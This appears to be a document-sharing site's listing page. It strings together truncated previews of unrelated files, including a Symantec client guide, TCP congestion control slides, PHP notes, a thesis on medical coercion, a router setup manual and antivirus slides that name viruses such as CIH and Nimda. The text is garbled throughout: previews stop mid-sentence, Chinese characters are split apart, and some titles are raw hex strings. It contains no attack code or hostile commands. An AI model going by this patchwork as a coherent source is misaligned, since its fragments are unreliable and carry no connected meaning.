ClientHelpSymantec™ Endpoint Protection 及 Symantec Network Access Control 客户端指南 Symantec Endpoint Protection 及 Symantec Network Access Control 客 户 端 指 南 Symantec Endpoint Protection 及 Symantec Network Access Control 客 户 端 指 南 本 手 册 介 绍 的 软 件 基 于 授 权 许 可 协 议 提 供, 且 只 能 在 遵 守 协 议 条

More information

<4D6963726F736F667420576F7264202D2032303130C4EAC0EDB9A4C0E04142BCB6D4C4B6C1C5D0B6CFC0FDCCE2BEABD1A15F325F2E646F63>

<4D6963726F736F667420576F7264202D2032303130C4EAC0EDB9A4C0E04142BCB6D4C4B6C1C5D0B6CFC0FDCCE2BEABD1A15F325F2E646F63> 2010 年 理 工 类 AB 级 阅 读 判 断 例 题 精 选 (2) Computer mouse How does the mouse work? We have to start at the bottom, so think upside down for now. It all starts with mouse ball. As the mouse ball in the bottom

More information

穨control.PDF

穨control.PDF TCP congestion control yhmiu Outline Congestion control algorithms Purpose of RFC2581 Purpose of RFC2582 TCP SS-DR 1998 TCP Extensions RFC1072 1988 SACK RFC2018 1996 FACK 1996 Rate-Halving 1997 OldTahoe

More information

Product Type Batteries (only) Circuit Breakers & Load Protection Connection Devices Contactors Ethernet Switches, Stratix Switches I/O Modules; PLC Ne

Product Type Batteries (only) Circuit Breakers & Load Protection Connection Devices Contactors Ethernet Switches, Stratix Switches I/O Modules; PLC Ne 1201 South Second Street Milwaukee, Wisconsin U.S.A. 53204 Tel 414-382-2000 1 July 2016 RE: China Restriction of Hazardous Substances (RoHS) Dear Customer, Rockwell Automation is committed to demonstrating

More information

Microsoft Word - ChineseSATII .doc

Microsoft Word - ChineseSATII .doc 中 文 SAT II 冯 瑶 一 什 么 是 SAT II 中 文 (SAT Subject Test in Chinese with Listening)? SAT Subject Test 是 美 国 大 学 理 事 会 (College Board) 为 美 国 高 中 生 举 办 的 全 国 性 专 科 标 准 测 试 考 生 的 成 绩 是 美 国 大 学 录 取 新 生 的 重 要 依

More information

東吳大學

東吳大學 律 律 論 論 療 行 The Study on Medical Practice and Coercion 林 年 律 律 論 論 療 行 The Study on Medical Practice and Coercion 林 年 i 讀 臨 療 留 館 讀 臨 律 六 礪 讀 不 冷 療 臨 年 裡 歷 練 禮 更 老 林 了 更 臨 不 吝 麗 老 劉 老 論 諸 見 了 年 金 歷 了 年

More information

Microsoft Word - 100118002.htm

Microsoft Word - 100118002.htm 100 年 度 11800 電 腦 軟 體 應 用 乙 級 技 術 士 技 能 檢 定 學 科 測 試 試 題 本 試 卷 有 選 擇 題 80 題, 每 題 1.25 分, 皆 為 單 選 選 擇 題, 測 試 時 間 為 100 分 鐘, 請 在 答 案 卡 上 作 答, 答 錯 不 倒 扣 ; 未 作 答 者, 不 予 計 分 准 考 證 號 碼 : 姓 名 : 選 擇 題 : 1. (3)

More information

C o n t e n t s...7... 15 1. Acceptance... 17 2. Allow Love... 19 3. Apologize... 21 4. Archangel Metatron... 23 5. Archangel Michael... 25 6. Ask for

C o n t e n t s...7... 15 1. Acceptance... 17 2. Allow Love... 19 3. Apologize... 21 4. Archangel Metatron... 23 5. Archangel Michael... 25 6. Ask for Doreen Virtue, Ph.D. Charles Virtue C o n t e n t s...7... 15 1. Acceptance... 17 2. Allow Love... 19 3. Apologize... 21 4. Archangel Metatron... 23 5. Archangel Michael... 25 6. Ask for a Sign... 27 7.

More information

Product Type Batteries (only) Circuit Breatkers & Load Protection Connection Devices Contactors Ethernet Switches, Stratix Switches I/O Modules; PLC N

Product Type Batteries (only) Circuit Breatkers & Load Protection Connection Devices Contactors Ethernet Switches, Stratix Switches I/O Modules; PLC N 1201 South Second Street Milwaukee, Wisconsin U.S.A. 53204 Tel 414-382-2000 1 July 2016 RE: China Restriction of Hazardous Substances (RoHS) Dear Customer, Rockwell Automation is committed to demonstrating

More information

WWW PHP

WWW PHP WWW PHP 2003 1 2 function function_name (parameter 1, parameter 2, parameter n ) statement list function_name sin, Sin, SIN parameter 1, parameter 2, parameter n 0 1 1 PHP HTML 3 function strcat ($left,

More information

Chapter 2

Chapter 2 2 (Setup) ETAP PowerStation ETAP ETAP PowerStation PowerStation PowerPlot ODBC SQL Server Oracle SQL Server Oracle Windows SQL Server Oracle PowerStation PowerStation PowerStation PowerStation ETAP PowerStation

More information

Microsoft PowerPoint - AWOL - Acrobat Windows Outlook.ppt [Compatibility Mode]

Microsoft PowerPoint - AWOL - Acrobat Windows Outlook.ppt [Compatibility Mode] AWOL Windows - Tips & Tricks Resolution, color depth & refresh rate Background color Service packs Disk cleanup (cleanmgr) Disk defragmentation AWOL Windows Resolution, Color Depth & Refresh Rate The main

More information

202 The Sending Back of The Japanese People in Taiwan in The Beginning Years After the World War II Abstract Su-ying Ou* In August 1945, Japan lost th

202 The Sending Back of The Japanese People in Taiwan in The Beginning Years After the World War II Abstract Su-ying Ou* In August 1945, Japan lost th 201 1945 8 1945 202 The Sending Back of The Japanese People in Taiwan in The Beginning Years After the World War II Abstract Su-ying Ou* In August 1945, Japan lost the war and had to retreat from Taiwan.

More information

Gassama Abdoul Gadiri University of Science and Technology of China A dissertation for master degree Ordinal Probit Regression Model and Application in Credit Rating for Users of Credit Card Author :

More information

高中英文科教師甄試心得

高中英文科教師甄試心得 高 中 英 文 科 教 師 甄 試 心 得 英 語 學 系 碩 士 班 林 俊 呈 高 雄 市 立 高 雄 高 級 中 學 今 年 第 一 次 參 加 教 師 甄 試, 能 夠 在 尚 未 服 兵 役 前 便 考 上 高 雄 市 立 高 雄 高 級 中 學 專 任 教 師, 自 己 覺 得 很 意 外, 也 很 幸 運 考 上 後 不 久 在 與 雄 中 校 長 的 會 談 中, 校 長 的 一 句

More information

Important Notice SUNPLUS TECHNOLOGY CO. reserves the right to change this documentation without prior notice. Information provided by SUNPLUS TECHNOLO

Important Notice SUNPLUS TECHNOLOGY CO. reserves the right to change this documentation without prior notice. Information provided by SUNPLUS TECHNOLO Car DVD New GUI IR Flow User Manual V0.1 Jan 25, 2008 19, Innovation First Road Science Park Hsin-Chu Taiwan 300 R.O.C. Tel: 886-3-578-6005 Fax: 886-3-578-4418 Web: www.sunplus.com Important Notice SUNPLUS

More information

Time Estimation of Occurrence of Diabetes-Related Cardiovascular Complications by Ching-Yuan Hu A thesis submitted in partial fulfillment of the requi

Time Estimation of Occurrence of Diabetes-Related Cardiovascular Complications by Ching-Yuan Hu A thesis submitted in partial fulfillment of the requi Time Estimation of Occurrence of Diabetes-Related Cardiovascular Complications by Ching-Yuan Hu Master of Science 2011 Institute of Chinese Medical Sciences University of Macau Time Estimation of Occurrence

More information

SL2511 SR Plus 操作手冊_單面.doc

SL2511 SR Plus 操作手冊_單面.doc IEEE 802.11b SL-2511 SR Plus SENAO INTERNATIONAL CO., LTD www.senao.com - 1 - - 2 - .5 1-1...5 1-2...6 1-3...6 1-4...7.9 2-1...9 2-2 IE...11 SL-2511 SR Plus....13 3-1...13 3-2...14 3-3...15 3-4...16-3

More information

全 国 高 等 职 业 教 育 规 划 教 材 21 世 纪 高 职 高 专 规 划 教 材 系 列 高 等 职 业 教 育 计 算 机 专 业 规 划 教 材 选 题 征 集 通 知 一 选 题 范 围 ( 不 仅 限 于 此 ) 选 题 方 向 选 题 名 计 算 机 基 础 计 算 机 应 用

全 国 高 等 职 业 教 育 规 划 教 材 21 世 纪 高 职 高 专 规 划 教 材 系 列 高 等 职 业 教 育 计 算 机 专 业 规 划 教 材 选 题 征 集 通 知 一 选 题 范 围 ( 不 仅 限 于 此 ) 选 题 方 向 选 题 名 计 算 机 基 础 计 算 机 应 用 刘 瑞 新 金 牌 作 者 经 典 作 品 教 授, 计 算 机 专 业 资 深 学 科 带 头 人, 多 部 著 作 获 得 全 国 优 秀 畅 销 书 奖 他 所 编 写 的 教 材 内 容 均 来 自 教 学 实 践, 是 对 编 写 讲 义 教 学 修 改 教 学 讲 义 再 次 教 学 整 个 过 程 的 精 确 提 炼, 因 此 对 促 进 教 师 教 学 学 生 学 习 发 挥 了 重

More information

Chapter #

Chapter # 第三章 TCP/IP 协议栈 本章目标 通过本章的学习, 您应该掌握以下内容 : 掌握 TCP/IP 分层模型 掌握 IP 协议原理 理解 OSI 和 TCP/IP 模型的区别和联系 TCP/IP 介绍 主机 主机 Internet TCP/IP 早期的协议族 全球范围 TCP/IP 协议栈 7 6 5 4 3 应用层表示层会话层传输层网络层 应用层 主机到主机层 Internet 层 2 1 数据链路层

More information

Desktop Management Guide

Desktop Management Guide Ĵ* 商 用 台 式 机 文 档 部 件 号 312947-AA1 2003 詤 3 本 指 南 介 绍 了 预 装 在 某 些 机 型 上 的 安 全 保 护 功 能 和 智 能 管 理 功 能 的 定 义 及 使 用 说 明 2002 Hewlett-Packard Company 2002 Hewlett-Packard Development Company, L.P. HP Hewlett

More information

< F5FB77CB6BCBD672028B0B6A46AABE4B751A874A643295F5FB8D5C5AA28A668ADB6292E706466>

< F5FB77CB6BCBD672028B0B6A46AABE4B751A874A643295F5FB8D5C5AA28A668ADB6292E706466> A A A A A i A A A A A A A ii Introduction to the Chinese Editions of Great Ideas Penguin s Great Ideas series began publication in 2004. A somewhat smaller list is published in the USA and a related, even

More information

4. 每 组 学 生 将 写 有 习 语 和 含 义 的 两 组 卡 片 分 别 洗 牌, 将 顺 序 打 乱, 然 后 将 两 组 卡 片 反 面 朝 上 置 于 课 桌 上 5. 学 生 依 次 从 两 组 卡 片 中 各 抽 取 一 张, 展 示 给 小 组 成 员, 并 大 声 朗 读 卡

4. 每 组 学 生 将 写 有 习 语 和 含 义 的 两 组 卡 片 分 别 洗 牌, 将 顺 序 打 乱, 然 后 将 两 组 卡 片 反 面 朝 上 置 于 课 桌 上 5. 学 生 依 次 从 两 组 卡 片 中 各 抽 取 一 张, 展 示 给 小 组 成 员, 并 大 声 朗 读 卡 Tips of the Week 课 堂 上 的 英 语 习 语 教 学 ( 二 ) 2015-04-19 吴 倩 MarriottCHEI 大 家 好! 欢 迎 来 到 Tips of the Week! 这 周 我 想 和 老 师 们 分 享 另 外 两 个 课 堂 上 可 以 开 展 的 英 语 习 语 教 学 活 动 其 中 一 个 活 动 是 一 个 充 满 趣 味 的 游 戏, 另 外

More information

1 SQL Server 2005 SQL Server Microsoft Windows Server 2003NTFS NTFS SQL Server 2000 Randy Dyess DBA SQL Server SQL Server DBA SQL Server SQL Se

1 SQL Server 2005 SQL Server Microsoft Windows Server 2003NTFS NTFS SQL Server 2000 Randy Dyess DBA SQL Server SQL Server DBA SQL Server SQL Se 1 SQL Server 2005 DBA Microsoft SQL Server SQL ServerSQL Server SQL Server SQL Server SQL Server SQL Server 2005 SQL Server 2005 SQL Server 2005 o o o SQL Server 2005 1 SQL Server 2005... 3 2 SQL Server

More information

Microsoft PowerPoint - STU_EC_Ch08.ppt

Microsoft PowerPoint - STU_EC_Ch08.ppt 樹德科技大學資訊工程系 Chapter 8: Counters Shi-Huang Chen Fall 2010 1 Outline Asynchronous Counter Operation Synchronous Counter Operation Up/Down Synchronous Counters Design of Synchronous Counters Cascaded Counters

More information

Symantec™ Sygate Enterprise Protection 防护代理安装使用指南

Symantec™ Sygate Enterprise Protection 防护代理安装使用指南 Symantec Sygate Enterprise Protection 防 护 代 理 安 装 使 用 指 南 5.1 版 版 权 信 息 Copyright 2005 Symantec Corporation. 2005 年 Symantec Corporation 版 权 所 有 All rights reserved. 保 留 所 有 权 利 Symantec Symantec 徽 标 Sygate

More information

Microsoft PowerPoint - ryz_030708_pwo.ppt

Microsoft PowerPoint - ryz_030708_pwo.ppt Long Term Recovery of Seven PWO Crystals Ren-yuan Zhu California Institute of Technology CMS ECAL Week, CERN Introduction 20 endcap and 5 barrel PWO crystals went through (1) thermal annealing at 200 o

More information

Microsoft Word - (web)_F.1_Notes_&_Application_Form(Chi)(non-SPCCPS)_16-17.doc

Microsoft Word - (web)_F.1_Notes_&_Application_Form(Chi)(non-SPCCPS)_16-17.doc 聖 保 羅 男 女 中 學 學 年 中 一 入 學 申 請 申 請 須 知 申 請 程 序 : 請 將 下 列 文 件 交 回 本 校 ( 麥 當 勞 道 33 號 ( 請 以 A4 紙 張 雙 面 影 印, 並 用 魚 尾 夾 夾 起 : 填 妥 申 請 表 並 貼 上 近 照 小 學 五 年 級 上 下 學 期 成 績 表 影 印 本 課 外 活 動 表 現 及 服 務 的 證 明 文 件 及

More information

防病毒技术.ppt

防病毒技术.ppt Trojan horse (Worm) Fred Cohen, Dean Dennis Michael shain RAM CIH Loveletter Sircam CodeRedII Nimda Klez Mylife VBS/Redolf Loveletter Code Red Nimda Klez.E Mylife.A *.sys, *.com (from C:\ folder)

More information

Computer Architecture

Computer Architecture ECE 3120 Computer Systems Assembly Programming Manjeera Jeedigunta http://blogs.cae.tntech.edu/msjeedigun21 Email: msjeedigun21@tntech.edu Tel: 931-372-6181, Prescott Hall 120 Prev: Basic computer concepts

More information

提纲 1 2 OS Examples for 3

提纲 1 2 OS Examples for 3 第 4 章 Threads2( 线程 2) 中国科学技术大学计算机学院 October 28, 2009 提纲 1 2 OS Examples for 3 Outline 1 2 OS Examples for 3 Windows XP Threads I An Windows XP application runs as a seperate process, and each process may

More information

声 明 本 人 郑 重 声 明 : 此 处 所 提 交 的 硕 士 学 位 论 文 基 于 等 级 工 鉴 定 的 远 程 考 试 系 统 客 户 端 开 发 与 实 现, 是 本 人 在 中 国 科 学 技 术 大 学 攻 读 硕 士 学 位 期 间, 在 导 师 指 导 下 进 行 的 研 究

声 明 本 人 郑 重 声 明 : 此 处 所 提 交 的 硕 士 学 位 论 文 基 于 等 级 工 鉴 定 的 远 程 考 试 系 统 客 户 端 开 发 与 实 现, 是 本 人 在 中 国 科 学 技 术 大 学 攻 读 硕 士 学 位 期 间, 在 导 师 指 导 下 进 行 的 研 究 中 国 科 学 技 术 大 学 硕 士 学 位 论 文 题 目 : 农 村 电 工 岗 位 培 训 考 核 与 鉴 定 ( 理 论 部 分 ) 的 计 算 机 远 程 考 试 系 统 ( 服 务 器 端 ) 的 开 发 与 实 现 英 文 题 目 :The Realization of Authenticating Examination System With Computer & Web for

More information

硕 士 学 位 论 文 论 文 题 目 : 北 岛 诗 歌 创 作 的 双 重 困 境 专 业 名 称 : 中 国 现 当 代 文 学 研 究 方 向 : 中 国 新 诗 研 究 论 文 作 者 : 奚 荣 荣 指 导 老 师 : 姜 玉 琴 2014 年 12 月

硕 士 学 位 论 文 论 文 题 目 : 北 岛 诗 歌 创 作 的 双 重 困 境 专 业 名 称 : 中 国 现 当 代 文 学 研 究 方 向 : 中 国 新 诗 研 究 论 文 作 者 : 奚 荣 荣 指 导 老 师 : 姜 玉 琴 2014 年 12 月 硕 士 学 位 论 文 论 文 题 目 : 北 岛 诗 歌 创 作 的 双 重 困 境 专 业 名 称 : 中 国 现 当 代 文 学 研 究 方 向 : 中 国 新 诗 研 究 论 文 作 者 : 奚 荣 荣 指 导 老 师 : 姜 玉 琴 2014 年 12 月 致 谢 文 学 是 我 们 人 类 宝 贵 的 精 神 财 富 两 年 半 的 硕 士 学 习 让 我 进 一 步 接 近 文 学,

More information

* RRB *

* RRB * *9000000000RRB0010040* *9000000000RRB0020040* *9000000000RRB0030040* *9000000000RRB0040040* *9000000000RRC0010050* *9000000000RRC0020050* *9000000000RRC0030050* *9000000000RRC0040050* *9000000000RRC0050050*

More information

<4D6963726F736F667420576F7264202D205F4230365FB942A5CEA668B443C5E9BB73A740B5D8A4E5B8C9A552B1D0A7F75FA6BFB1A4ACFC2E646F63>

<4D6963726F736F667420576F7264202D205F4230365FB942A5CEA668B443C5E9BB73A740B5D8A4E5B8C9A552B1D0A7F75FA6BFB1A4ACFC2E646F63> 運 用 多 媒 體 製 作 華 文 補 充 教 材 江 惜 美 銘 傳 大 學 應 用 中 文 系 chm248@gmail.com 摘 要 : 本 文 旨 在 探 究 如 何 運 用 多 媒 體, 結 合 文 字 聲 音 圖 畫, 製 作 華 文 補 充 教 材 當 我 們 在 進 行 華 文 教 學 時, 往 往 必 須 透 過 教 案 設 計, 並 製 作 補 充 教 材, 方 能 使 教 學

More information

1505.indd

1505.indd 上 海 市 孙 中 山 宋 庆 龄 文 物 管 理 委 员 会 上 海 宋 庆 龄 研 究 会 主 办 2015.05 总 第 148 期 图 片 新 闻 2015 年 9 月 22 日, 由 上 海 孙 中 山 故 居 纪 念 馆 台 湾 辅 仁 大 学 和 台 湾 图 书 馆 联 合 举 办 的 世 纪 姻 缘 纪 念 孙 中 山 先 生 逝 世 九 十 周 年 及 其 革 命 历 程 特 展

More information

9 * B0-0 * 16ZD097 10 2018 5 3 11 117 2011 349 120 121 123 46 38-39 12 2018 5 23 92 939 536 2009 98 1844 13 1 25 926-927 3 304 305-306 1 23 95 14 2018 5 25 926-927 122 1 1 self-ownership 15 22 119 a b

More information

1.ai

1.ai HDMI camera ARTRAY CO,. LTD Introduction Thank you for purchasing the ARTCAM HDMI camera series. This manual shows the direction how to use the viewer software. Please refer other instructions or contact

More information

1. 請 先 檢 查 包 裝 內 容 物 AC750 多 模 式 無 線 分 享 器 安 裝 指 南 安 裝 指 南 CD 光 碟 BR-6208AC 電 源 供 應 器 網 路 線 2. 將 設 備 接 上 電 源, 即 可 使 用 智 慧 型 無 線 裝 置 進 行 設 定 A. 接 上 電 源

1. 請 先 檢 查 包 裝 內 容 物 AC750 多 模 式 無 線 分 享 器 安 裝 指 南 安 裝 指 南 CD 光 碟 BR-6208AC 電 源 供 應 器 網 路 線 2. 將 設 備 接 上 電 源, 即 可 使 用 智 慧 型 無 線 裝 置 進 行 設 定 A. 接 上 電 源 1. 請 先 檢 查 包 裝 內 容 物 AC750 多 模 式 無 線 分 享 器 安 裝 指 南 安 裝 指 南 CD 光 碟 BR-6208AC 電 源 供 應 器 網 路 線 2. 將 設 備 接 上 電 源, 即 可 使 用 智 慧 型 無 線 裝 置 進 行 設 定 A. 接 上 電 源 B. 啟 用 智 慧 型 裝 置 的 無 線 Wi-Fi C. 選 擇 無 線 網 路 名 稱 "edimax.setup"

More information

Fun Time (1) What happens in memory? 1 i n t i ; 2 s h o r t j ; 3 double k ; 4 char c = a ; 5 i = 3; j = 2; 6 k = i j ; H.-T. Lin (NTU CSIE) Referenc

Fun Time (1) What happens in memory? 1 i n t i ; 2 s h o r t j ; 3 double k ; 4 char c = a ; 5 i = 3; j = 2; 6 k = i j ; H.-T. Lin (NTU CSIE) Referenc References (Section 5.2) Hsuan-Tien Lin Deptartment of CSIE, NTU OOP Class, March 15-16, 2010 H.-T. Lin (NTU CSIE) References OOP 03/15-16/2010 0 / 22 Fun Time (1) What happens in memory? 1 i n t i ; 2

More information

2005 3,, :,,,, (),,,,, [],,,,,,,,,,, (),, (,, ),,,,,,,,,,,,,,,,,,,,,,,,,( ),, :,,, :,?,,, :,1999,

2005 3,, :,,,, (),,,,, [],,,,,,,,,,, (),, (,, ),,,,,,,,,,,,,,,,,,,,,,,,,( ),, :,,, :,?,,, :,1999, (), 70,,,,,, :,31, 1555,;18,,, ;,, (1895),, 1 2005 3,, :,,,, (),,,,, [],,,,,,,,,,, (),, (,, ),,,,,,,,,,,,,,,,,,,,,,,,,( ),, :,,, :,?,,, :,1999,24 25 2 (),,,,,,, 1970,,,,,, ;,; :,,?? 1988,,, 1987 1990,,,

More information

2. 佔 中 對 香 港 帶 來 以 下 影 響 : 正 面 影 響 - 喚 起 市 民 對 人 權 及 ( 專 制 ) 管 治 的 關 注 和 討 論 o 香 港 市 民 總 不 能 一 味 認 命, 接 受 以 後 受 制 於 中 央, 沒 有 機 會 選 出 心 中 的 理 想 特 首 o 一

2. 佔 中 對 香 港 帶 來 以 下 影 響 : 正 面 影 響 - 喚 起 市 民 對 人 權 及 ( 專 制 ) 管 治 的 關 注 和 討 論 o 香 港 市 民 總 不 能 一 味 認 命, 接 受 以 後 受 制 於 中 央, 沒 有 機 會 選 出 心 中 的 理 想 特 首 o 一 220 參 考 答 案 專 題 1. 公 民 抗 命 與 革 命 的 異 同 如 下 : 公 民 抗 命 革 命 相 同 之 處 目 的 兩 種 行 動 都 是 為 了 抗 拒 當 權 政 府 不 受 歡 迎 的 決 定 及 政 策 方 法 兩 者 都 是 在 嘗 試 其 他 合 法 的 抗 爭 行 動 後, 無 可 奈 何 的 最 後 手 段 不 同 之 處 目 的 只 是 令 政 府 的 某 些

More information

南華大學數位論文

南華大學數位論文 A THESIS FOR THE DEGREE OF MASTER OF BUSINESS ADMINISTRATION GRADUATE INSTITUTE IN PUBLISHING NAN HUA UNIVERSITY THE OPERATION MODELS OF WRITERS PRESSES IN TAIWAN ADVISOR: PH.D. CHEN CHUN-JUNG GRADUATE

More information

Microsoft Word - Final Exam Review Packet.docx

Microsoft Word - Final Exam Review Packet.docx Do you know these words?... 3.1 3.5 Can you do the following?... Ask for and say the date. Use the adverbial of time correctly. Use Use to ask a tag question. Form a yes/no question with the verb / not

More information

BIBLID 0254-4466(2000)18: pp. 231-260 18 89 12 ** 1992 1987 * ** 231 232 1991 1998 1958 1995 1998 1994 1989 233 1987 196 1989 82-83 234 1992 1994 1 2 1994 60 1 1. 2. 2 235 1989 37 3 4 1992 74 3 4 236 1-2

More information

Preface This guide is intended to standardize the use of the WeChat brand and ensure the brand's integrity and consistency. The guide applies to all d

Preface This guide is intended to standardize the use of the WeChat brand and ensure the brand's integrity and consistency. The guide applies to all d WeChat Search Visual Identity Guidelines WEDESIGN 2018. 04 Preface This guide is intended to standardize the use of the WeChat brand and ensure the brand's integrity and consistency. The guide applies

More information

3戴文鋒-人文.indd

3戴文鋒-人文.indd 國 立 臺 南 大 學 南大學報 第39卷第2期人文與社會類 民國94年 41 66 41 臺灣媽祖 抱接砲彈 神蹟傳說試探 戴文鋒 國立臺南大學臺灣文化研究所 摘 要 二次大戰期間與終戰之後 臺灣各地許多媽祖廟宇 紛紛出現了在二次大戰期間媽祖曾經 顯靈抱接住盟軍所投擲砲彈 因而保住了當地人的生命財產安全的神蹟傳說 二次大戰美軍轟 炸臺灣時 臺灣民間所盛傳的媽祖靈驗事蹟 雖然甚為誇張 但至今仍有信徒

More information

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco Windows RTEMS 1 Danilliu MMI TCP/IP 80486 QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos ecos Email www.rtems.com RTEMS ecos RTEMS RTEMS Windows

More information

P4i45GL_GV-R50-CN.p65

P4i45GL_GV-R50-CN.p65 1 Main Advanced Security Power Boot Exit System Date System Time Floppy Drives IDE Devices BIOS Version Processor Type Processor Speed Cache Size Microcode Update Total Memory DDR1 DDR2 Dec 18 2003 Thu

More information

致 谢 本 人 自 2008 年 6 月 从 上 海 外 国 语 大 学 毕 业 之 后, 于 2010 年 3 月 再 次 进 入 上 外, 非 常 有 幸 成 为 汉 语 国 际 教 育 专 业 的 研 究 生 回 顾 三 年 以 来 的 学 习 和 生 活, 顿 时 感 觉 这 段 时 间 也

致 谢 本 人 自 2008 年 6 月 从 上 海 外 国 语 大 学 毕 业 之 后, 于 2010 年 3 月 再 次 进 入 上 外, 非 常 有 幸 成 为 汉 语 国 际 教 育 专 业 的 研 究 生 回 顾 三 年 以 来 的 学 习 和 生 活, 顿 时 感 觉 这 段 时 间 也 精 英 汉 语 和 新 实 用 汉 语 课 本 的 对 比 研 究 The Comparative Study of Jing Ying Chinese and The New Practical Chinese Textbook 专 业 : 届 别 : 姓 名 : 导 师 : 汉 语 国 际 教 育 2013 届 王 泉 玲 杨 金 华 1 致 谢 本 人 自 2008 年 6 月 从 上 海 外

More information

XXX专业本科人才培养方案

XXX专业本科人才培养方案 计 算 机 科 学 与 技 术 专 业 本 科 人 才 培 养 方 案 (Computer Science and Technology 080901) 一 培 养 目 标 本 专 业 培 养 德 智 体 美 全 面 发 展, 具 有 良 好 的 科 学 与 人 文 素 养, 熟 悉 经 济 管 理 法 律 等 相 关 基 础 知 识, 系 统 地 掌 握 计 算 机 硬 件 软 件 方 面 的 基

More information

Microsoft PowerPoint - ATF2015.ppt [相容模式]

Microsoft PowerPoint - ATF2015.ppt [相容模式] Improving the Video Totalized Method of Stopwatch Calibration Samuel C.K. Ko, Aaron Y.K. Yan and Henry C.K. Ma The Government of Hong Kong Special Administrative Region (SCL) 31 Oct 2015 1 Contents Introduction

More information

Ác Åé å Serial ATA ( Sil3132) S A T A (1) SATA (2) BIOS SATA (3)* RAID BIOS RAID (4) SATA (5) SATA (a) S A T A ( S A T A R A I D ) (b) (c) Windows XP

Ác Åé å Serial ATA ( Sil3132) S A T A (1) SATA (2) BIOS SATA (3)* RAID BIOS RAID (4) SATA (5) SATA (a) S A T A ( S A T A R A I D ) (b) (c) Windows XP Serial ATA ( Sil3132)...2 (1) SATA... 2 (2) B I O S S A T A... 3 (3) RAID BIOS RAID... 6 (4) S A T A... 10 (5) S A T A... 12 Ác Åé å Serial ATA ( Sil3132) S A T A (1) SATA (2) BIOS SATA (3)* RAID BIOS

More information

WTO

WTO 10384 200015128 UDC Exploration on Design of CIB s Human Resources System in the New Stage (MBA) 2004 2004 2 3 2004 3 2 0 0 4 2 WTO Abstract Abstract With the rapid development of the high and new technique

More information

Microsoft PowerPoint - IAS 21 - IFRS宣導會.pptx

Microsoft PowerPoint - IAS 21 - IFRS宣導會.pptx IAS 21 Nov 19, 2010 Agenda Page 1 1 2 4 3 11 4 17 5 IFRS 23 Section 1 Section 1 WHY IAS 21? IAS 21 2 Section 1 Determination Functional Currency Presentation Currency First Time Adoption IFRS IAS 21 2

More information

PLC Simulative Control of an Elevator by PLC POWER SUPPLY ii iii ABSTRACT In the modern time, elevator is very popular and based. Most techniques of elevator are owned by foreigners. A simple introduction

More information

VB程序设计教程

VB程序设计教程 高 等 学 校 教 材 Visual Basic 程 序 设 计 教 程 魏 东 平 郑 立 垠 梁 玉 环 石 油 大 学 出 版 社 内 容 提 要 本 书 是 按 高 等 学 校 计 算 机 程 序 设 计 课 程 教 学 大 纲 编 写 的 大 学 教 材, 主 要 包 括 VB 基 础 知 识 常 用 程 序 结 构 和 算 法 Windows 用 户 界 面 设 计 基 础 文 件 处

More information

Stochastic Processes (XI) Hanjun Zhang School of Mathematics and Computational Science, Xiangtan University 508 YiFu Lou talk 06/

Stochastic Processes (XI) Hanjun Zhang School of Mathematics and Computational Science, Xiangtan University 508 YiFu Lou talk 06/ Stochastic Processes (XI) Hanjun Zhang School of Mathematics and Computational Science, Xiangtan University hjzhang001@gmail.com 508 YiFu Lou talk 06/04/2010 - Page 1 Outline 508 YiFu Lou talk 06/04/2010

More information

考試學刊第10期-內文.indd

考試學刊第10期-內文.indd misconception 101 Misconceptions and Test-Questions of Earth Science in Senior High School Chun-Ping Weng College Entrance Examination Center Abstract Earth Science is a subject highly related to everyday

More information

Microsoft Word - 第四組心得.doc

Microsoft Word - 第四組心得.doc 徐 婉 真 這 四 天 的 綠 島 人 權 體 驗 營 令 我 印 象 深 刻, 尤 其 第 三 天 晚 上 吳 豪 人 教 授 的 那 堂 課, 他 讓 我 聽 到 不 同 於 以 往 的 正 義 之 聲 轉 型 正 義, 透 過 他 幽 默 熱 情 的 語 調 激 起 了 我 對 政 治 的 興 趣, 願 意 在 未 來 多 關 心 社 會 多 了 解 政 治 第 一 天 抵 達 綠 島 不 久,

More information

致 谢 本 论 文 能 得 以 完 成, 首 先 要 感 谢 我 的 导 师 胡 曙 中 教 授 正 是 他 的 悉 心 指 导 和 关 怀 下, 我 才 能 够 最 终 选 定 了 研 究 方 向, 确 定 了 论 文 题 目, 并 逐 步 深 化 了 对 研 究 课 题 的 认 识, 从 而 一

致 谢 本 论 文 能 得 以 完 成, 首 先 要 感 谢 我 的 导 师 胡 曙 中 教 授 正 是 他 的 悉 心 指 导 和 关 怀 下, 我 才 能 够 最 终 选 定 了 研 究 方 向, 确 定 了 论 文 题 目, 并 逐 步 深 化 了 对 研 究 课 题 的 认 识, 从 而 一 中 美 国 际 新 闻 的 叙 事 学 比 较 分 析 以 英 伊 水 兵 事 件 为 例 A Comparative Analysis on Narration of Sino-US International News Case Study:UK-Iran Marine Issue 姓 名 : 李 英 专 业 : 新 闻 学 学 号 : 05390 指 导 老 师 : 胡 曙 中 教 授 上 海

More information

untitled

untitled LBS Research and Application of Location Information Management Technology in LBS TP319 10290 UDC LBS Research and Application of Location Information Management Technology in LBS , LBS PDA LBS

More information

Chinese oil import policies and reforms 随 着 经 济 的 发 展, 目 前 中 国 石 油 消 费 总 量 已 经 跃 居 世 界 第 二 作 为 一 个 负 责 任 的 大 国, 中 国 正 在 积 极 推 进 能 源 进 口 多 元 化, 鼓 励 替 代

Chinese oil import policies and reforms 随 着 经 济 的 发 展, 目 前 中 国 石 油 消 费 总 量 已 经 跃 居 世 界 第 二 作 为 一 个 负 责 任 的 大 国, 中 国 正 在 积 极 推 进 能 源 进 口 多 元 化, 鼓 励 替 代 Chinese oil import policies and reforms SINOPEC EDRI 2014.8 Chinese oil import policies and reforms 随 着 经 济 的 发 展, 目 前 中 国 石 油 消 费 总 量 已 经 跃 居 世 界 第 二 作 为 一 个 负 责 任 的 大 国, 中 国 正 在 积 极 推 进 能 源 进 口 多 元 化,

More information

<4D6963726F736F667420576F7264202D20B5DAC8FDB7BDBE57C9CFD6A7B8B6D6AEB7A8C2C98696EE7DCCBDBEBF2E646F63>

